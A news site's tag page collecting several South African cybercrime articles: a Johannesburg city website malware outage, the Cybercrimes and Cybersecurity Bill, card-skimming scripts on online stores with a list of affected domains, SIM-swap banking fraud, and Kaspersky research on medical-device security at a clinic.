Tag: cybercrime

City of Joburg hit by malware

The City of Johannesburg has said it suspected that malware has infected one of the servers hosting its Web site, causing major downtime last week.

This is just one in a long string of woes for the city.

The billing system, inherited from the ANC when the DA won the metro, has been in crisis for some months. The City tried to fix it by rolling out a new system, which automatically requires payment on the 15th of the month unless rate payers ask for it to be the 28th, by way of e-mail or the call centre.

As a result of the change in date, as well as a lack of postal notices and SMS notices, many household have unintentionally fallen behind in payment – or worse, have not, but have been cut off anyway. Re-instatement of electricity is a costly and time-consuming exercise, and falling behind on payments can impact credit ratings.

Local councillors instructed their ward members to use the CoJ Web site to ensure they know what they owe and don’t fall behind on payments.

However, the city’s website – https://joburg.org.za/ – was inaccessible through browsers like Google Chrome for almost two days last week, due to a malware warning from Google.

When attempting to access the site, Google’s safe browsing warning turns users away, stating that it contains harmful content – including pages that “send visitors to harmful websites”.

The city said it was aware of the issue, and had an investigation underway.

“Preliminary indications suggest that one of the servers hosting the website may be infected with malware. It is also possible that the outage may be a result of corrupted code,” said the City of Johannesburg.

“Fortunately, the city’s customer data has not been compromised as it resides in separate servers.”

According to the ZACR’s records, the City of Johannesburg is the registrant of the domain, while Internet Solutions is the sponsoring registrar.

Although the issues with the site have since been fixed, it leaves many questioning what kind of security is in place for one of the city’s most important databases.

Source: MyBroadband; My Office News

The Deputy Minister of Justice and Constitutional Development, John Jeffery, said the country’s new Cybercrimes and Cybersecurity Bill will be tabled in Parliament soon.

The Bill has already been approved by Cabinet.

“The Bill aims to put in place a coherent and integrated cybersecurity statutory framework to address various shortcomings which exist in dealing with cybercrime and cybersecurity in the country,” stated the SA Government website.

The purpose of the Cybercrimes and Cybersecurity Bill is to:

  • Create offences and prescribe penalties;
  • Further regulate jurisdiction;
  • Further regulate the powers to investigate, search and gain access to or seize items;
  • Further regulate aspects of international cooperation in respect of the investigation of cybercrime;
  • Provide for the establishment of a 24/7 point of contact;
  • Provide for the establishment of various structures to deal with cybersecurity;
  • Regulate the identification and declaration of National Critical Information Infrastructures and provides for measures to protect National Critical Information Infrastructures;
  • Further regulate aspects relating to evidence;
  • Impose obligations on electronic communications service providers regarding aspects which may impact on cybersecurity;
  • Provide that the President may enter into agreements with foreign States to promote cybersecurity; and
  • Repeal and amend certain laws.

How it will affect you

Michalsons law firm has published an overview of the Cybercrimes and Cybersecurity Bill, explaining why we need it and who will be affected by it. The bill is aimed at keeping South Africans safe from cybercrime and consolidates the country’s cybercrime laws into one place.

People who will be affected by the new bill include “everyone who uses a computer or the Internet”, along with:

  • People involved with IT or POPI compliance;
  • Electronic Communications Service Providers;
  • Providers of software or hardware tools that could be used to commit offences;
  • Financial services providers;
  • Owners of copyrights and pirates;
  • Information Security experts; and
  • Anyone who owns an Information Infrastructure that Government could declare as critical.

What the bill deals with
The bill creates around 50 new offences, which are related to data, messages, computers, and networks, said Michalsons.

These offences include:

  • Using personal information or financial information to commit an offence;
  • Hacking;
  • Unlawful interception of data;
  • Computer-related forgery and uttering; and
  • Extortion or terrorist activity.

The penalties for these offences range from 1-10 years in prison or up to a R10-million fine.

The bill also aims to protect critical infrastructure of a strategic nature from interference and disruption.

This infrastructure includes that which aids in keeping the country’s security, defence, and law enforcement operational; and provides essential services.

Powers to investigate

“The Cybercrimes and Cybersecurity Bill gives the South African Police and the State Security Agency extensive powers to investigate, search, access, and seize just about anything – like a computer, database, or network,” said Michalsons.

As part of the requirements of the bill, the Minister of Police must establish a National Cybercrime Centre and a Cyber Response Committee, of which the chairperson will be the Director-General: State Security.

The Minister of Defence must also establish and operate a Cyber Command, while the Minister of Telecommunications and Postal Services must establish a Cyber Security Hub.

Source: www.mybroadband.co.za

Hackers have installed credit card skimming scripts on thousands of online stores, including numerous South African platforms, according to a recent article by MyBroadband.

An investigation by Dutch developer Willem de Groot revealed that a host of online stores have been compromised and are stealing users’ credit card details.

De Groot says hackers gained access to the source code using unpatched security flaws.

Once a store is under control of a cybercriminal, a JavaScript wiretap is installed that funnels live payment data to an offshore collection server (mostly in Russia).

“This wiretap operates transparently for customers and the merchant. Skimmed credit cards are then sold on the dark Web,” says De Groot.

He adds that online skimming is very effective, because it is hard to detect and it is near impossible to trace the thieves.

International online stores

According to De Groot’s research, more than 750 online stores who were unwillingly skimming payment card details for attackers in 2015 are still doing so today, showing that this type of activity can go undetected for months.

De Groot’s data suggests there are multiple groups engaged in online skimming. While in 2015 there were variants of the same malware code, today there are three distinct malware families with a total of nine variants.
“The first malware just intercepted pages that had checkout in the URL,” he says.

“Newer versions also check for popular payment plugins such as Fire Checkout, One Step Checkout, and PayPal.”

The malicious code is obfuscated and is deployed using known vulnerabilities in content management solutions or e-commerce software that Web site owners have failed to patch.

What’s worse is that some shop owners don’t seem to grasp the seriousness of these issues or understand their impact. De Groot gives some examples of the worst answers he has received from companies when he attempted to inform them about the compromises.

“We don’t care; our payments are handled by a third party payment provider,” one unnamed shop owner says.
“Our shop is safe because we use HTTPS,” says another.

While HTTPS protects against man-in-the-middle attacks, where the attacker is in a position on the network to intercept traffic between a user and a server, malicious code runs on the server itself and is served over HTTPS, so it can see whatever information users enter into Web sites.

As for using a third-party payment processor, “if someone can inject JavaScript into your site, your database is most likely also hacked”, De Groot says.

The good news is that some shop owners are taking action, with 334 stores fixed in a 48-hour period. On the other hand, during the same time period, 170 new stores were hacked.

South African online stores

De Groot published the list of 5 900 compromised stores on GitHub, but it was quickly removed.

“After publishing a list of compromised online stores, I was contacted by several persons who claimed their site had not been compromised, and who threatened to sue me,” says De Groot.

However, these sites were all compromised, pointing to archive.org which he says “provides solid proof”.

“I have, prior to publication, submitted all URLs and malware samples to Google’s Safe Browsing team. They have since only acted upon a small portion of the sites,” he says.

He says he understands that being included in the list can be painful for a merchant, but this was needed to prevent the problem from growing.

MyBroadband tested the listed South African Web sites, and all of them were blocked by anti-malware software or browser warnings, and informed all the Web sites before publishing the article.

According to MyBroadband, the list of infected sites are:

  • bridalinc.co.za
  • collections.audi.co.za
  • ethicalpods.co.za
  • goldenwest.co.za
  • gudgudbuy.co.za
  • healthcart.co.za
  • kenpowertools.co.za
  • kingsleyheath.co.za
  • medibeds.co.za
  • ord-er.co.za
  • popshopfun.co.za
  • purechild.co.za
  • redfern.co.za
  • snugglybum.co.za
  • sugarandspike.co.za
  • teaflower.co.za
  • uprotect.co.za
  • woodster.co.za

Source: PC World; MyBroadband

Banking fraud is here to stay

Internet users are contributing to banking and financial fraud by falling victims to cyber-scams designed to steal cash, says a cyber security expert.

While credit card fraud has declined in SA by 28,6%, according to the South African Banking Risk Information Centre (Sabric), debit card fraud increased 8,3% to the year ended 2015.

The organisation also reported that Card Not Present (CNP) fraud increased by 12,6% to account for 75% of losses relating to South African issued credit cards.

“The problem is not that the cyber-criminals are stealing our information, but rather that we are giving it to them,” says Tjaart van der Walt, chief executive of Truteq Group.

“We click on the links in the phishing emails and we install the ‘free’ apps on our mobile phones. This mechanism to get your banking information is more about social engineering than hacking in the old sense,” he adds.

Trojan attacks
Security firm Kaspersky Lab recently reported that cyber-criminals have turned to Trojans designed to steal financial information and install malicious software on both PCs and smartphones.

“Almost every detected threat in South Africa is an advertising Trojan that can use root rights on the phone,” Roman Unuchek, senior malware analyst at Kaspersky Lab USA recently told Fin24.
Van der Walt says the divergent interests of communication and financial security between mobile phone operators and banks has left a security gap.

“Using mobile technology to secure financial transactions was not part of the specifications or the intended purpose. Three decades later, mobile telephony has turned out to be indispensable to our way of life and there is now a mobile phone in almost every pocket,” he says.
Banks typically use a one-time PIN (OTP) sent to a customer’s cell phone to secure online transactions. However, mobile operators do not want to expose themselves to additional risk.

“In the delivery of a one-time pin, a mobile network operator has very little (in all likelihood no) legal or financial risk. The terms and conditions of use limit their liability and case law exists to reinforce this position. In fact, a mobile network operator will not want to be associated with the authentication of financial transactions at all,” Van der Walt says.

The fact that many banks send the verification to the same mobile number to conduct the transaction may leave customers vulnerable if a cybercriminal has compromised the device.

SIM-swap fraud
“Using the same mobile phone to make a transaction and to verify it [financial transactions], wipes out the benefit of the two-factor authentication. Fraudsters only have to compromise you once in order to break into your bank account and clean it out,” says Van der Walt.

The problem is magnified when customers enact a SIM-swap – or if criminals conduct a fraudulent SIM-swap.

“The identification process followed by a mobile network operator’s call centre agent to verify your identity for the purposes of a SIM swap or network port is as simple as possible. Their interest is to keep us talking and if we cannot make a call, then we cannot talk and consume credit,” says Van der Walt.

“The banks, on the other hand, need the verification process to be as rigorous as possible in order to comply with anti-money laundering and counter-terrorism laws,” he adds.
Van der Walt argued that about 1% of mobile subscribers conduct a SIM swap per month, implying a change in about 870 000 numbers in SA.
While not all mobile subscribers are banking customers, Van der Walt says number porting could place a strain in banks’ ability to keep track of customers.
“Even if a bank had the access to see if a user has ported or not, blocking a transaction purely on the basis of the user changing networks will drive hundreds of thousands of irate customers to their call centres,” he says.
By Duncan Alfreds for Fin24

How safe is your medical information?

A Kaspersky Lab Global Research & Analysis Team (GReAT) expert has conducted real field research at one private clinic in an attempt to explore its security weaknesses and how to address them. Vulnerabilities were found in medical devices that opened a door for cybercriminals to access the personal data of patients, as well as their physical well-being.

A modern clinic is a complicated system. It has sophisticated medical devices that comprise fully functional computers with an operating system and applications installed on them. Doctors rely on computers, and all information is stored in a digital format. In addition, all healthcare technologies are connected to the Internet. So, it comes as no surprise that both medical devices and hospital IT infrastructure have previously been targeted by hackers. The most recent examples of such incidents are ransomware attacks against hospitals in the US and Canada. But a massive malicious attack is only one way in which criminals could exploit the IT infrastructure of a modern hospital.

Clinics store personal information about their patients. They also own and use very expensive, hard to fix and replace equipment, which makes them a potentially valuable target for extortion and data theft.
The outcome of a successful cyberattack against a medical organisation could differ in detail but will always be dangerous.

It could involve the following:
• The felonious use of personal patient data: the resale of information to third parties or demanding the clinic pay a ransom to get back sensitive information about patients;
• The intentional falsification of patient results or diagnoses;
• Medical equipment damage may cause both physical damage to patients and huge financial losses to a clinic;
• Negative impact on the reputation of a clinic.

Exposure to the Internet

The first thing that a Kaspersky Lab expert decided to explore, while conducting this research, was to understand how many medical devices around the globe are now connected to the Internet. Modern medical devices are fully-functional computers with an operating system and most of these have a communication channel to the Internet. By hacking them, criminals could interfere with their functionality.

A quick look over the Shodan search engine for Internet-connected devices showed hundreds of devices – from MRI scanners, to cardiology equipment, radioactive medical equipment and other related devices are registered there. This discovery leads to worrisome conclusions – some of these devices still work on old operational systems such as Windows XP, with unpatched vulnerabilities, and some even use default passwords that can be easily found in public manuals.
Using these vulnerabilities criminals could access a device interface and potentially affect the way it works.

Inside the clinic’s local network

The above mentioned scenario was one of the ways in which cybercriminals could get access to the clinic’s critical infrastructure. But the most obvious and logical way is to try to attack its local network. During the research a vulnerability was found in the clinic’s Wi-Fi connection. Through a weak communications protocol access to the local network was gained.

Exploring the local clinic’s network, the Kaspersky Lab expert found some medical equipment that was previously found on Shodan. This time however, to get access to the equipment one didn’t need any password at all – because the local network was a trusted network for medical equipment applications and users. This is how a cybercriminal can gain access to a medical device.

Further exploring the network, the Kaspersky Lab expert discovered a new vulnerability in a medical device application. A command shell was implemented in the user’s interface that could give cybercriminals access to personal patient information, including their clinical history and information about medical analysis, as well as their addresses and ID details. Moreover, through this vulnerability the whole device controlled with this application could be compromised. For example, among these devices could be MRI scanners, cardiology equipment, radioactive and surgical equipment. Firstly, criminals could alter the way the device works and cause physical damage to the patients. Secondly, criminals could damage the device itself at immense cost to the hospital.

“Clinics are no longer only doctors and medical equipment, but IT services too. The work of a clinic’s internal security services affects the safety of patient data and the functionality of its devices. Medical software and equipment engineers put a lot of effort into creating a useful medical device that will save and protect human life, but they sometimes completely forget about protecting it from unauthorised external access. When it comes to new technologies, safety issues should be addressed at the first stage of the research and development (R&D) process. IT security companies could help at this stage to address safety issues,” mentions Sergey Lozhkin, senior researcher at Kaspersky Lab’s GReAT.

Kaspersky Lab experts recommend implementing the following measures to protect clinics from unauthorised access:
• Use strong passwords to protect all external connection points;
• Update IT security policies, develop on time patch management and vulnerability assessments;
• Protect medical equipment applications in the local network with passwords in case of an unauthorised access to the trusted area;
• Protect infrastructure from threats like malware and hacking attacks with a reliable security solution;
• Backup critical information regularly and keep a backup copy offline.

The danger of data leaks

As many companies and institutions have discovered, data breaches are costly – not only in terms of financial losses, but also in terms of reputational damage. A data breach is defined as the intentional or unintentional release of secure information to an environment that is untrusted, such as the Internet.

Continue reading

  • 1
  • 2

Follow us on social media: 

               

View our magazine archives: 

                       


My Office News Ⓒ 2017 - Designed by A Collective


SUBSCRIBE TO OUR NEWSLETTER
Top